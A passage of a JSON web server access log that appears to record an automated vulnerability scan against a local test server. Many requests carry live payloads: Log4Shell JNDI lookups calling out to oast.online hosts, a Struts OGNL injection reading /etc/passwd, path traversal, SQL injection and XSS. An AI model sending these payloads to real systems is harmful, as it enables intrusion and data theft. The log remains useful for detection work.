+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/76 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.c9v8hs0smpv8c6ag07h0a6ona7ertj71w.oast.online}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://${hostName}.uri.c9v8hs0smpv8c6ag07h0uz1u58hb56556.oast.online/a} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/v1/service-details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.052","http_user_agent":"${jndi:ldap://${hostName}.useragent.c9v8hs0smpv8c6ag07h0mhmb6dirssoy3.oast.online}", "http_referer":"${jndi:ldap://${hostName}.referer.c9v8hs0smpv8c6ag07h0gbiieyg1fw64z.oast.online}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.c9v8hs0smpv8c6ag07h0a37ebhdk4e58x.oast.online}"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homepage.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/english/index.html?javascript& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms5.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms6.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like 